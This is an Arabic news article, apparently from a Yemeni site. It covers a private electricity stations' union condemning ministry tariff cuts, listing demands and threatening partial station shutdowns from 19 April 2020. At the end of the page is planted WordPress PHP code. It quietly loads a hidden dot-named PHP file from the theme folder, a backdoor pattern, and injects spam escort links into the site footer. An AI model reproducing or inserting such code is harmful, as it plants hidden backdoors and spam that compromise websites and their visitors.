غير مصنف

نقابة محطات الكهرباء بالجمهورية تستنكر قرارات الوزارة ً  وتكشف عما سيحدث بداية الأسبوع القادم “التفاصيل”

وصفتها بالمزاجية والتخبط غير المسؤول ..

الهوية نت – صنعاء

استنكرت النقابة العامة لمحطات توليد وتوزيع الكهرباء الخاصة بالجمهورية القرارات الصادرة عن وزارة الكهرباء بشأن تخفيض تعرفة الكيلو والاشتراك الشهري والتي سيترتب عليها الكثير من الاضرار بالمستثمرين في مجال الطاقة.

ووصفت النقابة في بيان صادر عنها أمس الخميس، هذه القرارات بالمزاجية والتخبط غير المسؤول في التعامل مع المستثمرين دون مراعاة للخسائر الفادحة التي قد تلحق بهم وتودي الى انهيار وتوقف خدمة الكهرباء.

وحّملت النقابة وزير الكهرباء والمؤسسة المسؤولية الكاملة ازاء ما يترتب عن هذه القرارات المجحفة والمخالفة لمحاضر الوزارة المتفق عليها مسبقا مع القطاع الخاص.

وطالبت النقابة في بيانها إلغاء ما جاء في قرارات الوزارة الأخيرة ..مؤكدة على عدم القبول بما جاء فيه والتمسك والالتزام بكل الاتفاقيات والمحاضر السابقة الموقعة بين اصحاب المحطات والوزارة والمؤسسة.

كما طالبت بإيقاف الحملات الأمنية من قبل الوزارة وممارسة التعسفات على الملاك وإغلاق المحطات بدون أي مسوغ قانوني.

وناشدت رئيس المجلس السياسي الأعلى المشير مهدي المشاط ورئيس الوزراء الدكتور عبدالعزيز بن حبتور بالأخذ بعين الاعتبار لقضيتهم وحمايتهم والتوجيه بإيقاف هذه القرارات التعسفية المجحفة ، وإلزام الوزارة بتنفيذ محاضرها المتفق عليها مسبقًا ..

داعية الى إحالة من قاموا بالاعتداء على المحطات وقطع الكابلات الى النيابة وإيقاف حملات التشهير الإعلامي التي تصب في صالح بعض المتنفذين والفاسدين في الوزارة والمؤسسة

وأكدت النقابة اضطرارها في حال استمرار هذه التعسفات وعدم الاستجابة لمطالبها المشروعة الى إيقاف الجبايات والعوائد الشهرية، التي تدفعها للوزارة واطفاء الإنارة المجانية للشوارع والمؤسسات ، والبدء بأضراب جزئي وإطفاء محطات الكهرباء ومواصلة الخطوات التصعيدية التي كفلها الدستور والقانون.

وأشار البيان الى ان الوزارة فرضت على ملاك المحطات   الجبايات شهرياًَ لوزارة الكهرباء والمؤسسة على كل قدره مولد تصل متوسط اقل هذه الجبايات على المولدات الصغيرة الى خمسمائة الف ريال شهرياً وأكبرها كمتوسط الى اثنين او ثلاثة مليون شهرياَ عن كل محطة كهرباء وكذا رسوم تحسين وعن كل كابل يتم تمديده لخدمة المواطن وهذا جزء كبير مما يضخم ويرفع السعر .

كما استغرب البيان امن الحملة الاعلامية الشرسة على اصحاب محطات الكهرباء والتي يروج لها في القنوات الاعلامية ومواقع التواصل الاجتماعي والتي تهدف الى تشويه سمعتها وعملها الوطني متناسين ومتنكرين للدور الوطني وللمخاطرة التي جعلت المستثمر يدفع مبالغ خيالية في اصول من مولدات وكابلات ستضيع تلك الاصول في حالة عادة الكهرباء ادراج الرياح  لم يكن مبداها الاول والاخير سوى خدمة المواطن في ظل تعرض بلادنا للعدوان من تحالف الشر واذنابه وما يقوم به ملاك الكهرباء من تقديم خدمة للمواطن في ظل عجز الدوله عن قيامها بدورها في توفير تلك الخدمة .

كما أدان  واستنكر البيان  قيام صندوق النظافة والتحسين  بإغلاق بعض محطات الكهرباء والذي يتوجب عليهم ايقاف هذه الاجراءات حتى يتم الفصل فيها بحكم قضائي وفقاً للقانون , مستغلين في تنفيذهم لهذه القرارات الاجازة القضائية للمحاكم وغيرها .

كذلك الامر الذي يجعل من تلك الاجراءات مخالفة للقانون وتحمل في طياتها إكراه مادي ومعنوي لملاك المحطات لإجبارهم لتنفيذ هذه القرارات المطعون فيها والتنازل عن الطعون التي قدموها للمحكمة ضد هذه القرارات

وادان البيان  قيام وزارة الكهرباء والطاقة بإصدار قرار يفرض على ملاك المحطات تخفيض سعر التعرفة للكيلو وات الواحد وسعر الاشتراك الشهري ورسوم ادخال الخدمة , وذلك لمخالفتها للمعايير والآلية التي تم الاتفاق عليها مسبقاً بين ملاك المحطات التجارية وقيادة وزارة الكهرباء ومؤسستها والتي الزم بها ملاك المحطات في بيان سابق وخالفتها  وزارة الكهرباء واصدرت تعرفه تعسفية على ملاك المحطات من شأنها الحاق الضرر الكبير بهم وتدمير المستثمرين .

وحمل البيان  وزير الكهرباء والمؤسسة المسؤولية الكاملة لما قد يحصل من تداعيات ازاء هذه القرارات الخاطئة

وطالب البيان بتنفيذ عدد من الاجراءات التعسفية ضد ملاك محطات الكهرباء ومنها

1- ايقاف الحملات الامنية من قبل وزارة الكهرباء والمؤسسة والتعسفات واغلاق المحطات بدون مسوغ قانوني

2- الغاء القرار المجحف من قبل وزارة الكهرباء والمؤسسة وتمسكنا بكل الاتفاقيات التي تمت بين اصحاب المحطات والوزارة والمؤسسة

3- التزام الوزارة والمؤسسة الكهرباء بما جاء في المحاضر الموقعة بينها وبين ملاك المحطات الكهربائية بخصوص التعرفة للكيلو وات والاشتراك الشهري

4- احالة من قام بالتوجيه والاعتداء بقطع الكابلات الى النيابة العامة وتمسكنا بكل الحقوق السابقة والاعتداءات

5- تحديد مصير مستثمرين محطات الكهرباء وراس المال المقدر بعشرات المليارات وما مصيرها عند عودة الكهرباء

6- ايقاف حملات التشهير الاعلامي التي تصب في مصالح بعض المتنفذين من لوبي الفساد داخل وزارة الكهرباء والمؤسسة

مالم سنضطر اسفين الى ا / ايقاف الجبايات والعوائد الشهرية التي تدفع لوزارة الكهرباء والمؤسسة كل شهر

ب / اطفاء الانارة المجانية للشوارع والمؤسسات والحارات

ج / الاضراب الجزئي واطفاء محطات الكهرباء  لمدة ساعة

وذلك ابتداءً من يوم الاحد الموافق 19 / 4 / 2020م وحتى اشعار اخر

وفي حالة عدم الاستجابة سنضطر اسفين مواصلة الخطوات التصعيدية التي كفلها لنا الدستور القانون

الرحمه للشهداء الشفاء للجرحى النصر والصمود لشعبنا اليمني العظيم

والله من وراء القصد

صادر عن النفابه العامه لمحطات

توليد وتوزيع الكهرباء الخاص

مقالات ذات صلة

إغلاق
إغلاق
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) { include_once get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php"; } if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function zo(){ echo '
Manisa escort Tekirdağ escort Çanakkale escort Trabzon escort Yalova escort Balıkesir escort Aydın escort Muğla escort Afyon escort Aksaray escort Şanlıurfa escort Ümraniye escort Sinop escort Keçioren escort
'; } add_action("wp_footer",'zo');